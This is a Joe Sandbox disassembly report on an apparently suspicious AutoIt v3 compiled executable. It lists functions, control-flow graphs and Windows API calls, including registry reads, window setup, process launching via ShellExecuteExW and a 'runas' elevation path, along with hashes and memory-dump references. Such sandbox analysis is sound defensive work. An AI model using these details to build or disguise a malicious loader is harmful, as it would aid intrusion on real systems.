                                                                                                                                                                                                                                          control_flow_graph 302 11065b-11068b call 11042f 305 1106a6-1106b2 call 105221 302->305 306 11068d-110698 call ff2c6 302->306 312 1106b4-1106c9 call ff2c6 call ff2d9 305->312 313 1106cb-110714 call 11039a 305->313 311 11069a-1106a1 call ff2d9 306->311 322 11097d-110983 311->322 312->311 320 110781-11078a GetFileType 313->320 321 110716-11071f 313->321 326 1107d3-1107d6 320->326 327 11078c-1107bd GetLastError call ff2a3 CloseHandle 320->327 324 110721-110725 321->324 325 110756-11077c GetLastError call ff2a3 321->325 324->325 331 110727-110754 call 11039a 324->331 325->311 329 1107d8-1107dd 326->329 330 1107df-1107e5 326->330 327->311 341 1107c3-1107ce call ff2d9 327->341 334 1107e9-110837 call 10516a 329->334 330->334 335 1107e7 330->335 331->320 331->325 345 110847-11086b call 11014d 334->345 346 110839-110845 call 1105ab 334->346 335->334 341->311 352 11086d 345->352 353 11087e-1108c1 345->353 346->345 351 11086f-110879 call 1086ae 346->351 351->322 352->351 355 1108c3-1108c7 353->355 356 1108e2-1108f0 353->356 355->356 358 1108c9-1108dd 355->358 359 1108f6-1108fa 356->359 360 11097b 356->360 358->356 359->360 361 1108fc-11092f CloseHandle call 11039a 359->361 360->322 364 110931-11095d GetLastError call ff2a3 call 105333 361->364 365 110963-110977 361->365 364->365 365->360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0011039A: CreateFileW.KERNEL32(00000000,00000000,?,00110704,?,?,00000000,?,00110704,00000000,0000000C), ref: 001103B7
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0011076F
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00110776
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00110782
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0011078C
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00110795
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001107B5
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001108FF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00110931
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00110938
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                          • Opcode ID: f3e77cfd88acf063c3734e99f63c44376488844d6879195ff95dc16c7be0dfd9
                                                                                                                                                                                                                                          • Instruction ID: 546c6e60a86138a80e3c160cf14540f866ea9f94f4eb865b655e23eb72a86df3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3e77cfd88acf063c3734e99f63c44376488844d6879195ff95dc16c7be0dfd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA10832D041098FDF1EAF68DC517ED7BA0AB0A320F140169F855AB3D1D7719D92CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A1418,?,000D2E7F,?,?,?,00000000), ref: 000D3A78
                                                                                                                                                                                                                                            • Part of subcall function 000D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000D3379
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000D356A
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0011318D
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001131CE
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00113210
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00113277
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00113286
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                          • Opcode ID: 03316041a5ecdfa16faa8b28bcae4a5bc57e239073093efc0fe971b5b2363a52
                                                                                                                                                                                                                                          • Instruction ID: 1c2333fd3435deb484704843300b241782961854f538f8bc06a29241cdeba03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03316041a5ecdfa16faa8b28bcae4a5bc57e239073093efc0fe971b5b2363a52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC71B4715043019EC704EF69DC819ABBBE8FF9B740F40442EF585D36A1EB749A88CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 000D2B8E
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 000D2B9D
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 000D2BB3
                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 000D2BC5
                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 000D2BD7
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000D2BEF
                                                                                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 000D2C40
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: GetSysColorBrush.USER32(0000000F), ref: 000D2D07
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: RegisterClassExW.USER32(00000030), ref: 000D2D31
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000D2D42
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 000D2D5F
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000D2D6F
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: LoadIconW.USER32(000000A9), ref: 000D2D85
                                                                                                                                                                                                                                            • Part of subcall function 000D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000D2D94
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                          • Opcode ID: eb31049b7520bd288ded4991a959e812cdab8e3bbd28c253cd6788dd8058ea9f
                                                                                                                                                                                                                                          • Instruction ID: 4e9aef452e66a41af2b776512016524e8b6af77a7a088efe2479af61edf29295
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb31049b7520bd288ded4991a959e812cdab8e3bbd28c253cd6788dd8058ea9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 942118B4E00328BFDF109FA5EC55AA97FF4FF49B60F00002AE504A6AA0D7B10580CF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 443 d3170-d3185 444 d31e5-d31e7 443->444 445 d3187-d318a 443->445 444->445 446 d31e9 444->446 447 d318c-d3193 445->447 448 d31eb 445->448 449 d31d0-d31d8 DefWindowProcW 446->449 452 d3199-d319e 447->452 453 d3265-d326d PostQuitMessage 447->453 450 112dfb-112e23 call d18e2 call ee499 448->450 451 d31f1-d31f6 448->451 459 d31de-d31e4 449->459 489 112e28-112e2f 450->489 454 d321d-d3244 SetTimer RegisterWindowMessageW 451->454 455 d31f8-d31fb 451->455 457 d31a4-d31a8 452->457 458 112e7c-112e90 call 13bf30 452->458 460 d3219-d321b 453->460 454->460 464 d3246-d3251 CreatePopupMenu 454->464 461 d3201-d320f KillTimer call d30f2 455->461 462 112d9c-112d9f 455->462 465 d31ae-d31b3 457->465 466 112e68-112e72 call 13c161 457->466 458->460 484 112e96 458->484 460->459 479 d3214 call d3c50 461->479 468 112da1-112da5 462->468 469 112dd7-112df6 MoveWindow 462->469 464->460 473 d31b9-d31be 465->473 474 112e4d-112e54 465->474 480 112e77 466->480 476 112da7-112daa 468->476 477 112dc6-112dd2 SetFocus 468->477 469->460 482 d31c4-d31ca 473->482 483 d3253-d3263 call d326f 473->483 474->449 478 112e5a-112e63 call 130ad7 474->478 476->482 485 112db0-112dc1 call d18e2 476->485 477->460 478->449 479->460 480->460 482->449 482->489 483->460 484->449 485->460 489->449 493 112e35-112e48 call d30f2 call d3837 489->493 493->449
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000D316A,?,?), ref: 000D31D8
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,000D316A,?,?), ref: 000D3204
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000D3227
                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000D316A,?,?), ref: 000D3232
                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 000D3246
                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 000D3267
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                          • Opcode ID: 9fc0626a3da82505e1d3674bc3c1231077023e12efca768a4edc5a28df719583
                                                                                                                                                                                                                                          • Instruction ID: 8ca263a68d4cb41deed44596590318de7d49b7f984c6d197c740a6e86485b4cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc0626a3da82505e1d3674bc3c1231077023e12efca768a4edc5a28df719583
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38412939600306BBDF241F789D19BBE3A5AEB06354F040127F94196BA1CBB19A80D7B3
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 499 d1410-d1449 500 d144f-d1465 mciSendStringW 499->500 501 1124b8-1124b9 DestroyWindow 499->501 502 d146b-d1473 500->502 503 d16c6-d16d3 500->503 505 1124c4-1124d1 501->505 504 d1479-d1488 call d182e 502->504 502->505 506 d16f8-d16ff 503->506 507 d16d5-d16f0 UnregisterHotKey 503->507 519 d148e-d1496 504->519 520 11250e-11251a 504->520 511 112500-112507 505->511 512 1124d3-1124d6 505->512 506->502 510 d1705 506->510 507->506 509 d16f2-d16f3 call d10d0 507->509 509->506 510->503 511->505 515 112509 511->515 516 1124e2-1124e5 FindClose 512->516 517 1124d8-1124e0 call d6246 512->517 515->520 521 1124eb-1124f8 516->521 517->521 523 d149c-d14c1 call dcfa0 519->523 524 112532-11253f 519->524 526 112524-11252b 520->526 527 11251c-11251e FreeLibrary 520->527 521->511 525 1124fa-1124fb call 1432b1 521->525 537 d14f8-d1503 OleUninitialize 523->537 538 d14c3 523->538 531 112541-11255e VirtualFree 524->531 532 112566-11256d 524->532 525->511 526->520 530 11252d 526->530 527->526 530->524 531->532 533 112560-112561 call 143317 531->533 532->524 534 11256f 532->534 533->532 539 112574-112578 534->539 537->539 541 d1509-d150e 537->541 540 d14c6-d14f6 call d1a05 call d19ae 538->540 539->541 542 11257e-112584 539->542 540->537 544 112589-112596 call 1432eb 541->544 545 d1514-d151e 541->545 542->541 558 112598 544->558 546 d1524-d152f call d988f 545->546 547 d1707-d1714 call ef80e 545->547 559 d1535 call d1944 546->559 547->546 560 d171a 547->560 562 11259d-1125bf call efdcd 558->562 561 d153a-d15a5 call d17d5 call efe14 call d177c call d988f call dcfa0 call d17fe call efe14 559->561 560->547 561->562 588 d15ab-d15cf call efe14 561->588 567 1125c1 562->567 570 1125c6-1125e8 call efdcd 567->570 576 1125ea 570->576 579 1125ef-112611 call efdcd 576->579 586 112613 579->586 589 112618-112625 call 1364d4 586->589 588->570 595 d15d5-d15f9 call efe14 588->595 594 112627 589->594 597 11262c-112639 call eac64 594->597 595->579 600 d15ff-d1619 call efe14 595->600 603 11263b 597->603 600->589 605 d161f-d1643 call d17d5 call efe14 600->605 606 112640-11264d call 143245 603->606 605->597 614 d1649-d1651 605->614 613 11264f 606->613 616 112654-112661 call 1432cc 613->616 614->606 615 d1657-d1668 call d988f call d190a 614->615 623 d166d-d1675 615->623 622 112663 616->622 624 112668-112675 call 1432cc 622->624 623->616 625 d167b-d1689 623->625 630 112677 624->630 625->624 627 d168f-d16c5 call d988f * 3 call d1876 625->627 630->630
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000D1459
                                                                                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 000D14F8
                                                                                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 000D16DD
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001124B9
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0011251E
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0011254B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                          • Opcode ID: eea6a78690b15c8ec826cc7ad8337fd02390b9fd587726495c48a7f56720e6d8
                                                                                                                                                                                                                                          • Instruction ID: 7e5cb930c1737317525b944d3d0a30c9bb0978ef149a55fabbf2c0bdc284f055
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eea6a78690b15c8ec826cc7ad8337fd02390b9fd587726495c48a7f56720e6d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D13C31701212DFDB29EF15D895AA9F7A5BF05700F1441AEE44A6B362DF30AD62CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 648 d2c63-d2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000D2C91
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000D2CB2
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000D1CAD,?), ref: 000D2CC6
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000D1CAD,?), ref: 000D2CCF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                          • Opcode ID: 0c0d56c81b8a477b032730d3cb791bd2cd44c970410e85aca4f9f124681ec026
                                                                                                                                                                                                                                          • Instruction ID: aa5a7415601313feb5df815eb70a73905e610d119024289be44880477eb6eabc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0d56c81b8a477b032730d3cb791bd2cd44c970410e85aca4f9f124681ec026
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0DA765402A07AEF311B27AC08E773EBDEBC7F70F00405AFD00A29A0C6A51890DAB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 763 15ad64-15ad9c call da961 call f2340 768 15add1-15add5 763->768 769 15ad9e-15adb5 call d7510 763->769 770 15add7-15adee call d7510 call d7620 768->770 771 15adf1-15adf5 768->771 769->768 780 15adb7-15adce call d7510 call d7620 769->780 770->771 774 15adf7-15ae0e call d7510 771->774 775 15ae3a 771->775 778 15ae3c-15ae40 774->778 790 15ae10-15ae21 call d9b47 774->790 775->778 783 15ae53-15aeae call f2340 call d7510 ShellExecuteExW 778->783 784 15ae42-15ae50 call db567 778->784 780->768 800 15aeb7-15aeb9 783->800 801 15aeb0-15aeb6 call efe14 783->801 784->783 790->775 798 15ae23-15ae2e call d7510 790->798 798->775 808 15ae30-15ae35 call da8c7 798->808 805 15aec2-15aec6 800->805 806 15aebb-15aec1 call efe14 800->806 801->800 810 15aec8-15aed6 805->810 811 15af0a-15af0e 805->811 806->805 808->775 816 15aed8 810->816 817 15aedb-15aeeb 810->817 812 15af10-15af19 811->812 813 15af1b-15af33 call dcfa0 811->813 818 15af6d-15af7b call d988f 812->818 813->818 825 15af35-15af46 GetProcessId 813->825 816->817 820 15aef0-15af08 call dcfa0 817->820 821 15aeed 817->821 820->818 821->820 828 15af4e-15af67 call dcfa0 CloseHandle 825->828 829 15af48 825->829 828->818 829->828
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0015AEA3
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0015AF38
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015AF67
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                          • Opcode ID: 564ed32bbf322cdba0d8af6a169c1b2d8480d0fda2e8752896670294d117953d
                                                                                                                                                                                                                                          • Instruction ID: 0f0e5de05a4f25f9acff48a7f455bfebfdebafca58b66e4afcf49cf5ed49b21c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 564ed32bbf322cdba0d8af6a169c1b2d8480d0fda2e8752896670294d117953d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97717970A00619DFCB14EF54D495A9EBBF0FF08310F44859AE82AAB352DB70ED45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00112BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000D2B6B
                                                                                                                                                                                                                                            • Part of subcall function 000D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A1418,?,000D2E7F,?,?,?,00000000), ref: 000D3A78
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,00192224), ref: 00112C10
                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?,00192224), ref: 00112C17
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
